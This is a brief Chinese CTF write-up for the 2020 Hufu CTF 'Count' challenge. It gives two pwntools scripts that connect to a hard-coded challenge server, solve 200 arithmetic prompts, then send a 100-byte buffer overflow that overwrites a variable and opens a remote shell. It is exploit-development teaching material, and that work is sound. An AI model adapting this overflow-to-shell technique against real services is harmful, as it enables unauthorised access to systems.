
2020 虎符CTF Count

需要完成200次计算求值,结束后直接给出覆盖点,然后启动SHELL

#coding=utf-8
from pwn import *
# Neither `debug` nor `elf` is referenced again in the visible script.
debug = 0
elf = ELF('./pwn')
#nc 39.97.210.182 40285
# Challenge service endpoint; `p` is the tube every later call talks through.
target = ('39.97.210.182', 40285)
p = remote(*target)

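def _safe_arith(expr):
    """Evaluate an integer arithmetic expression without calling eval().

    Accepts integer literals, parentheses, unary +/- and the binary
    operators + - * // %.  Anything else (names, calls, attribute access,
    other operators) raises ValueError instead of being executed.
    Extend the operator tables if the service emits other operators.
    """
    import ast
    import operator

    binary_ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.FloorDiv: operator.floordiv,
        ast.Mod: operator.mod,
    }
    unary_ops = {ast.UAdd: operator.pos, ast.USub: operator.neg}

    def walk(node):
        if isinstance(node, ast.BinOp) and type(node.op) in binary_ops:
            return binary_ops[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in unary_ops:
            return unary_ops[type(node.op)](walk(node.operand))
        # literal_eval rejects every non-literal node with ValueError.
        value = ast.literal_eval(node)
        if isinstance(value, bool) or not isinstance(value, int):
            raise ValueError('only integer operands are allowed')
        return value

    if isinstance(expr, bytes):
        expr = expr.decode('ascii')
    try:
        tree = ast.parse(expr.strip(), mode='eval')
    except SyntaxError:
        raise ValueError('not an arithmetic expression: %r' % (expr,))
    return walk(tree.body)


def count():
    """Answer one arithmetic round: read the expression, send its value."""
    p.recvuntil(b'Math: ')
    mathstr = p.recvuntil(b'=', drop=True)
    # mathstr comes straight off the network.  The original passed it to
    # eval(), which lets whoever controls the remote end run arbitrary
    # Python on the machine running this script; parse it as plain
    # arithmetic instead.
    result = _safe_arith(mathstr)
    p.sendline(str(result).encode())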
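# The service asks 200 questions before it reads the final input.
for i in range(200):
    count()
    print(i)  # progress indicator

# 0x88 - 0x24 == 100 filler bytes, then the 64-bit little-endian value
# 0x12235612 that lands on the overwritten variable.
# Bytes literal on purpose: p64() returns bytes, and str + bytes raises
# TypeError on Python 3.
payload = b'a' * (0x88 - 0x24) + p64(0x12235612)
p.sendline(payload)


p.interactive()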
from pwn import *
# 'debug' makes pwntools log every byte sent and received on the tube.
context.log_level = 'debug'
#39.97.210.182 40285
# Challenge service endpoint; `p` is the tube every later call talks through.
target = ('39.97.210.182', 40285)
p = remote(*target)
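def fun():
    """Answer one round of the form ``Math: a * b + c + d``.

    Each operand is read as a two-character field and converted with
    int(), so unexpected data from the service raises ValueError rather
    than being interpreted.
    """
    p.recvuntil(b'Math: ')
    # recvn() blocks until exactly two bytes have arrived; recv(2) may
    # return a single byte when the TCP stream is split mid-operand.
    operands = [int(p.recvn(2))]
    for separator in (b'* ', b'+ ', b'+ '):
        p.recvuntil(separator)
        operands.append(int(p.recvn(2)))
    a, b, c, d = operands
    e = a * b + c + d
    p.sendline(str(e).encode())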
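# The service asks 200 questions before it reads the final input.
for i in range(200):
    fun()

# 100 filler bytes, then the 32-bit little-endian value 0x12235612 that
# lands on the overwritten variable.  Sent with send(), so no trailing
# newline is added.
# Bytes literal on purpose: p32() returns bytes, and str + bytes raises
# TypeError on Python 3.
p.send(b'a' * 100 + p32(0x12235612))
p.interactive()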